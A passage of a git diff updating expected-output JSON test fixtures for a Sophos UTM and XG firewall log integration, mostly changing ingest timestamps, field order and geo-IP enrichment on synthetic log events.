}, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:9:27-05:04:49 httpd[6562]: id=iurere severity=medium sys=erc sub=atu name=http accessaction=accept method=odte client=uis facility=sedquia user=reetd srcip=10.210.175.52 dstip=10.87.14.186 version=1.7641 storage=tasu ad_domain=mquae object=CSedu class=atae type=aeconseq attributes=boNemocount=duntutla node=mqu account=inimastatuscode=emipsum cached=venia profile=Loremi filteraction=uisnostr size=849 request=vol url=https://internal.example.com/ritat/dipi.jpg?aliquide=aliqui#agnaaliq referer=https://api.example.org/Bonorume/emeumfu.txt?iuntNequ=ender#quid error=mipsa authtime=teturad dnstime=nimide cattime=spernat avscantime=nevolu fullreqtime=itectobe device=rroq auth=itessequ ua=uunt exceptions=pic group=unt category=emUt categoryname=eiru content-type=sauteir 
reputation=pic application=caecatc app-id=iarc reason=emquia filename=duntutl file=idi extension=reetdo time=pidatatn function=cancel line=ncul message=mcorpor fwrule=ofd seq=lapariat initf=eth65 outitf=lo3615 dstmac=01:00:5e:b3:e3:90 srcmac=01:00:5e:0e:b3:8e proto=consequ length=min tos=riame prec=;gnaal ttl=nti srcport=1125 dstport=605 tcpflags=utlab info=colabo prec=ditem caller=did engine=BCS localip=idex host=nisiuta4810.api.test extra=apa server=10.85.200.58 cookie=esse set-cookie=idexeac port=2294 query=iatquovo uid=rExce", "event": { - "ingested": "2021-12-09T13:44:53.094253200Z" + "ingested": "2021-12-14T14:54:42.826971509Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:10:11-12:07:23 itametc1599.api.test ulogd: id=itaedi severity=low sys=ore sub=ips name=Authentication successful action=block fwrule=iamqu seq=aboN initf=eth2679 outitf=enp0s1164 dstmac=01:00:5e:c3:8a:24 srcmac=01:00:5e:5a:9d:a9 srcip=10.133.45.45 dstip=10.115.166.48 proto=utaliq length=icer tos=essequ prec=oeiu ttl=nsequa srcport=4180 dstport=4884 tcpflags=squa info=etM code=eve type=iru", "event": { - "ingested": "2021-12-09T13:44:53.094257300Z" + "ingested": "2021-12-14T14:54:42.826971902Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:10:25-19:09:57 tiumt5462.mail.localhost sshd: Invalid user admin from runt", "event": { - "ingested": "2021-12-09T13:44:53.094261800Z" + "ingested": "2021-12-14T14:54:42.826972285Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:11:9-02:12:32 vol1450.internal.host sshd: Server listening on 10.71.184.162 port 3506.", "event": { - "ingested": "2021-12-09T13:44:53.094266500Z" + "ingested": "2021-12-14T14:54:42.826972671Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:11:23-09:15:06 ipsec_starter[178]: IP address or index of physical interface changed -\u003e reinit of ipsec interface", "event": { - "ingested": "2021-12-09T13:44:53.094271400Z" + "ingested": "2021-12-14T14:54:42.826973055Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:12:7-16:17:40 rporissu573.api.test reverseproxy: [exercita] [emaperi:very-high] [pid 5943:ddoei] AH02312: Fatal error initialising mod_ssl, nihi.", "event": { - "ingested": "2021-12-09T13:44:53.094277Z" + "ingested": "2021-12-14T14:54:42.826973455Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:12:21-23:20:14 nostru774.corp URID: T=tatnonp ------ 1 - [exit] allow: natuserr", "event": { - "ingested": "2021-12-09T13:44:53.094283100Z" + "ingested": "2021-12-14T14:54:42.826973990Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:1:5-06:22:49 ipsec_starter[6226]: IP address or index of physical interface changed -\u003e reinit of ipsec interface", "event": { - "ingested": "2021-12-09T13:44:53.094288900Z" + "ingested": "2021-12-14T14:54:42.826974381Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:1:19-13:25:23 httpd[5037]: [iadese:unknown] [pid isundeo:emq] [client rehender] ModSecurity: Warning. 
uat [file \"apa\"] [line \"tani\"] [id \"per\"] [rev \"ngelitse\"] [msg \"olorsita\"] [severity \"medium\"] [ver \"1.7102\"] [maturity \"apariat\"] [accuracy \"iuntNequ\"] [tag \"rExc\"] [hostname \"lorsita2216.www5.example\"] [uri \"turvelil\"] [unique_id \"velitsed\"]rau", "event": { - "ingested": "2021-12-09T13:44:53.094294500Z" + "ingested": "2021-12-14T14:54:42.826974767Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:2:2-20:27:57 sum2208.host reverseproxy: [eir] [nia:medium] [pid 4346:mco] [client ritinvol] [quioffi] mod_avscan_check_file_single_part() called with parameter filename=quamquae", "event": { - "ingested": "2021-12-09T13:44:53.094300200Z" + "ingested": "2021-12-14T14:54:42.826975171Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:2:17-03:30:32 ore6843.local reverseproxy: [usmodite] [aveniam:medium] [pid 5126:xplicab] [client taev] No signature found, cookie: dictasu", "event": { - "ingested": "2021-12-09T13:44:53.094305900Z" + "ingested": "2021-12-14T14:54:42.826975575Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:3:3-10:33:06 Sedu1610.mail.corp reverseproxy: [audant] [porr:medium] [pid 7442:tation] [client uunturma] AH01114: cons: failed to make connection to backend: 10.177.35.133", "event": { - "ingested": "2021-12-09T13:44:53.094311700Z" + "ingested": "2021-12-14T14:54:42.826975966Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:3:17-17:35:40 corpo6737.example reverseproxy: [officiad] [aliquide:very-high] [pid 6600:errorsi] [client raincidu] [orincidi] cannot connect: failure (111)", "event": { - "ingested": "2021-12-09T13:44:53.094319Z" + "ingested": 
"2021-12-14T14:54:42.826976349Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:4:1-00:38:14 pop3proxy[6854]: Master started", "event": { - "ingested": "2021-12-09T13:44:53.094324900Z" + "ingested": "2021-12-14T14:54:42.826976735Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:4:15-07:40:49 eratvol314.www.home pop3proxy: Master started", "event": { - "ingested": "2021-12-09T13:44:53.094330700Z" + "ingested": "2021-12-14T14:54:42.826977126Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:4:29-14:43:23 utemvele1838.mail.test reverseproxy: [xplicabo] [aco:high] [pid 2389:ratione] [client nrepr] ModSecurity: Warning. uipex [file \"alorumw\"] [line \"nibus\"] [id \"eiusmo\"] [msg \"rci\"] [hostname \"seosquir715.local\"] [uri \"ercitati\"] [unique_id \"uiration\"]", "event": { - "ingested": "2021-12-09T13:44:53.094336500Z" + "ingested": "2021-12-14T14:54:42.826977517Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:5:13-21:45:57 ulapari2656.local reverseproxy: [itessec] [non:very-high] [pid 2237:licaboN] [client nvol] [moenimip] cannot connect: failure (111)", "event": { - "ingested": "2021-12-09T13:44:53.094342200Z" + "ingested": "2021-12-14T14:54:42.826977912Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:5:28-04:48:31 reverseproxy[4278]: [ritat] [iscinge:very-high] [pid 4264:rroquisq] [client tnonpro] [nimv] erunt while reading reply from cssd, referer: https://example.org/etcon/ipitlab.gif?utlabore=suscipi#tlabor", "event": { - "ingested": "2021-12-09T13:44:53.094347900Z" + "ingested": 
"2021-12-14T14:54:42.826978306Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:6:11-11:51:06 URID[7418]: T=xer ------ 1 - [exit] cancel: onemul", "event": { - "ingested": "2021-12-09T13:44:53.094353500Z" + "ingested": "2021-12-14T14:54:42.826978695Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:6:25-18:53:40 pluto[7201]: | handling event ips for 10.165.217.56 \"econse\" #otamr", "event": { - "ingested": "2021-12-09T13:44:53.094359200Z" + "ingested": "2021-12-14T14:54:42.826979098Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:7:10-01:56:14 stla2856.host reverseproxy: [onpro] [adolo:very-high] [pid 7766:siste] ModSecurity for Apache/nisiut (ostr) configured.", "event": { - "ingested": "2021-12-09T13:44:53.094364900Z" + "ingested": "2021-12-14T14:54:42.826979501Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:7:24-08:58:48 peri6748.www5.domain reverseproxy: [cingeli] [esseq:high] [pid 2404:aquae] AH00098: pid file otamrema overwritten -- Unclean shutdown of previous Apache run?", "event": { - "ingested": "2021-12-09T13:44:53.094370600Z" + "ingested": "2021-12-14T14:54:42.826979904Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:8:7-16:01:23 tnon5442.internal.test reverseproxy: [ive] [tquido:very-high] [pid 6108:taliquip] AH00295: caught accept, ectetu", "event": { - "ingested": "2021-12-09T13:44:53.094376300Z" + "ingested": "2021-12-14T14:54:42.826980295Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:8:21-23:03:57 
ariatu2606.www.host reverseproxy: [quamestq] [umquid:very-high] [pid 7690:rem] [client its] [inv] not all the file sent to the client: rin, referer: https://example.org/tation/tutlabo.jpg?amvo=ullamco#tati", "event": { - "ingested": "2021-12-09T13:44:53.094382100Z" + "ingested": "2021-12-14T14:54:42.826980692Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:9:5-06:06:31 imv1805.api.host ulogd: id=oenim severity=very-high sys=iaturExc sub=orsit name=ICMP flood detected action=cancel fwrule=eos seq=quameius initf=lo4665 outitf=lo3422 dstmac=01:00:5e:d6:f3:bc srcmac=01:00:5e:87:02:08 srcip=10.96.243.231 dstip=10.248.62.55 proto=ugiat length=quiin tos=apar prec=eleumiur ttl=chite srcport=5632 dstport=4206 tcpflags=tevelit info=etc code=lorem type=temvele", "event": { - "ingested": "2021-12-09T13:44:53.094387900Z" + "ingested": "2021-12-14T14:54:42.826981075Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:9:19-13:09:05 rita600.www5.localdomain reverseproxy: [ini] [elite:high] [pid 7650:mnisiut] AH00959: ap_proxy_connect_backend disabling worker for (10.132.101.158) for cipitlabs", "event": { - "ingested": "2021-12-09T13:44:53.094393600Z" + "ingested": "2021-12-14T14:54:42.826981470Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:10:3-20:11:40 sshd[2014]: Did not receive identification string from rroq", "event": { - "ingested": "2021-12-09T13:44:53.094399300Z" + "ingested": "2021-12-14T14:54:42.826981856Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:10:18-03:14:14 admini1122.www.local reverseproxy: [ritte] [umwritte:very-high] [pid 1817:atu] (13)failure: [client vol] AH01095: prefetch request body failed 
to 10.96.193.132:5342 (orumwr) from bori ()", "event": { - "ingested": "2021-12-09T13:44:53.094405Z" + "ingested": "2021-12-14T14:54:42.826982243Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:11:1-10:16:48 confd[2475]: id=utaliqu severity=low sys=xplicabo sub=quamni name=dol client=sisten facility=remeumf user=acommod srcip=10.96.200.83 version=1.7416 storage=sper object=asia class=roident type=olorem attributes=teursintcount=evelites node=nostr account=lapariat", "event": { - "ingested": "2021-12-09T13:44:53.094410800Z" + "ingested": "2021-12-14T14:54:42.826982625Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:11:15-17:19:22 emvel4391.localhost sshd: Did not receive identification string from quelaud", "event": { - "ingested": "2021-12-09T13:44:53.094416500Z" + "ingested": "2021-12-14T14:54:42.826983021Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:11:30-00:21:57 confd-sync[5454]: id=smodite severity=high sys=utpersp sub=rnatu name=ico", "event": { - "ingested": "2021-12-09T13:44:53.094422200Z" + "ingested": "2021-12-14T14:54:42.826983407Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:12:14-07:24:31 untinc5531.www5.test sshd: error: Could not get shadow information for NOUSER", "event": { - "ingested": "2021-12-09T13:44:53.094427800Z" + "ingested": "2021-12-14T14:54:42.826983795Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json b/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json index 88c4c6cf9dd..64ba1718103 100644 
--- a/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json +++ b/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json @@ -72,7 +72,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.714793100Z", + "ingested": "2021-12-14T14:54:45.179828242Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:48 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=041101618035 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"firewall@firewallgate.com\" to_email_address=\"Sysadmin@elasticuser.com\" email_subject=\"*ALERT* Sophos XG Firewall\" mailid=\"qkW2Y6-LxBk6U-vH-1590055245\" mailsize=19728 spamaction=\"QUEUED\" reason=\"Email has been accepted by Device and queued for scanning.\" src_domainname=\"elasticuser.com\" dst_domainname=\"\" src_ip=\"\" src_country_code=\"\" dst_ip=\"\" dst_country_code=\"\" protocol=\"TCP\" src_port=0 dst_port=0 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041101618035", "kind": "event", @@ -99,19 +99,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, 
@@ -124,28 +119,23 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 52742, - "bytes": 0, - "ip": "175.16.199.1", - "domain": "constant-big.email", "user": { "email": "telekommunikation@constant-big.email" - } + }, + "bytes": 0, + "ip": "175.16.199.1", + "domain": "constant-big.email" }, "tags": [ "preserve_original_event" @@ -199,7 +189,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.714802Z", + "ingested": "2021-12-14T14:54:45.179830780Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:49 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=041105613003 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Clean\" status=\"\" priority=Information fw_rule_id=22 user_name=\"\" av_policy_name=\"Default\" from_email_address=\"telekommunikation@constant-big.email\" to_email_address=\"info@pelasticuser.com\" email_subject=\"Telefonservice statt Anrufbeantworter\" mailid=\"\u003cMzQ4NzU1ODA4Mw==.70c409993fe53cb7c5e32c9974adf8ff@constant-big\" mailsize=13371 spamaction=\"Accept\" reason=\"Mail is Clean.\" src_domainname=\"constant-big.email\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=USA dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=52742 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041105613003", "kind": "event", 
@@ -226,19 +216,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -251,28 +236,23 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 51789, - "bytes": 0, - "ip": "175.16.199.1", - "domain": "17buddies.net", "user": { "email": "ripxfc@17buddies.net" - } + }, + "bytes": 0, + "ip": "175.16.199.1", + "domain": "17buddies.net" }, "tags": [ "preserve_original_event" 
@@ -326,7 +306,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.714808300Z", + "ingested": "2021-12-14T14:54:45.179831235Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:50 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=041107413001 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"Spam\" from_email_address=\"ripxfc@17buddies.net\" to_email_address=\"hein.mueck@elasticuser.de\" email_subject=\"nimm dringend Geld\" mailid=\"\u003coE6Bl1v.H9RXAIt.N5WB1my7xW.JavaMail.app@9in8-vovZnu.prod.17bud\" mailsize=2025 spamaction=\"Reject\" reason=\"Mail detected as SPAM.\" src_domainname=\"17buddies.net\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=BRA dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=51789 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"", "code": "041107413001", "kind": "alert", @@ -355,19 +335,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, 
@@ -380,28 +355,23 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 55002, - "bytes": 0, - "ip": "175.16.199.1", - "domain": "ELTOBGI.COM", "user": { "email": "SHERIF.TOBGI@ELTOBGI.COM" - } + }, + "bytes": 0, + "ip": "175.16.199.1", + "domain": "ELTOBGI.COM" }, "tags": [ "preserve_original_event" @@ -455,7 +425,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.714814200Z", + "ingested": "2021-12-14T14:54:45.179831652Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=045908413004 log_type=\"Anti-Spam\" log_component=\"SMTPS\" log_subtype=\"Probable Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"rule3\" from_email_address=\"SHERIF.TOBGI@ELTOBGI.COM\" to_email_address=\"info@elasticuser.com\" email_subject=\"09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20\" mailid=\"\u003c20200518070235.C1623996C64F9957@ELTOBGI.COM\u003e\" mailsize=1032152 spamaction=\"Prefix Subject\" reason=\"Sender IP address is blacklisted.\" src_domainname=\"ELTOBGI.COM\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=GBR dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"RBL\"", "code": "045908413004", "kind": "alert", 
@@ -550,7 +520,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.714820100Z", + "ingested": "2021-12-14T14:54:45.179832050Z", "original": "device=\"SFW\" date=2017-01-31 time=18:34:41 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44313350024-P29PUA log_id=041113413005 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Outbound Spam\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"gaurav\" av_policy_name=\"Gaurav123\" from_email_address=\"gaurav1@iview.com\" to_email_address=\" gaurav2@iview.com\" email_subject=\"RPD Spam Test: Spam\" mailid=\"\u003ca22c9da6-19e5-4764-2836-3f48d7dcc329@iview.com\u003e\" mailsize=405 spamaction=\"Accept\" reason=\"\" src_domainname=\" iview.com\" dst_domainname=\"\" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol=\"TCP\" src_port=22420 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"", "code": "041113413005", "kind": "alert", @@ -645,7 +615,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.714826Z", + "ingested": "2021-12-14T14:54:45.179832450Z", "original": "device=\"SFW\" date=2018-06-06 time=11:10:11 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041114413006 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Outbound Probable Spam\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"\" av_policy_name=\"rule 8\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil1@Postman.local\" email_subject=\"RPD Spam test: Bulk\" mailid=\"\u003cc63b1eb2-1c17-73ac-fcc3- 20e8831dc3d3@postman.local\u003e\" mailsize=439 spamaction=\"Drop\" reason=\"Mail detected as OUTBOUND PROBABLE SPAM.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol=\"TCP\" src_port=58043 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"", "code": "041114413006", "kind": "alert", 
@@ -740,7 +710,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.714831800Z", + "ingested": "2021-12-14T14:54:45.179832829Z", "original": "device=\"SFW\" date=2018-06-06 time=12:50:07 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041121613009 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"DLP\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" av_policy_name=\"postman\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil1@Postman. local\" email_subject=\"Fwd: TESt\" mailid=\"c0000002-1528269606\" mailsize=5041 spamaction=\"DROP\" reason=\"Email containing confidential data detected. Relevant Data Protection Policy applied.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol=\"TCP\" src_port=60134 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"DLP\"", "code": "041121613009", "kind": "alert", @@ -835,7 +805,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.714838100Z", + "ingested": "2021-12-14T14:54:45.179833215Z", "original": "device=\"SFW\" date=2018-06-06 time=12:51:34 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041122613010 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"SPX\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil1@Postman.local\" email_subject=\"[secure:pankhil]\" mailid=\"c0000003-1528269693\" mailsize=442 spamaction=\"Accept\" reason=\"SPX Template of type Specified by Sender successfully applied on Email.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.16.204 dst_country_code=R1 protocol=\"TCP\" src_port=60298 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041122613010", "kind": "event", 
@@ -919,7 +889,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.714843900Z", + "ingested": "2021-12-14T14:54:45.179833585Z", "original": "device=\"SFW\" date=2018-06-06 time=12:53:39 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041123413012 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Dos\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"\" to_email_address=\"\" email_subject=\"\" mailid=\"\" mailsize=0 spamaction=\"TMPREJECT\" reason=\"SMTP DoS\" src_domainname=\"\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol=\"TCP\" src_port=60392 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041123413012", "kind": "alert", @@ -1013,7 +983,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.714849800Z", + "ingested": "2021-12-14T14:54:45.179833963Z", "original": "device=\"SFW\" date=2018-06-06 time=12:56:53 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041102413014 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Denied\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"\" av_policy_name=\"postman\" from_email_address=\"pankhil1@postman.local\" to_email_address=\"pankhil@postman. local\" email_subject=\"Fwd: test sand\" mailid=\"c0000008-1528270010\" mailsize=419835 spamaction=\"DROP\" reason=\"Email is marked Malicious by Sophos Sandstorm.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol=\"TCP\" src_port=60608 dst_port=25 sent_bytes=0 recv_bytes=0", "code": "041102413014", "kind": "alert", 
@@ -1109,7 +1079,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.714855600Z", + "ingested": "2021-12-14T14:54:45.179834342Z", "original": "device=\"SFW\" date=2017-01-31 time=18:31:11 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44313350024-P29PUA log_id=041207414001 log_type=\"Anti-Spam\" log_component=\"POP3\" log_subtype=\"Spam\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"gaurav\" av_policy_name=\"GauravPatel\" from_email_address=\"gaurav1@iview.com\" to_email_address=\"gaurav2@iview. com\" email_subject=\"RPD Spam Test: Spam\" mailid=\"\u003c2a2dd5d4-1a30-617b-27b1-7961ad07cf07@iview.com\u003e\" mailsize=574 spamaction=\"Accept\" reason=\"\" src_domainname=\" iview.com\" dst_domainname=\"iview.com\" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol=\"TCP\" src_port=22333 dst_port=110 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041207414001", "kind": "alert", @@ 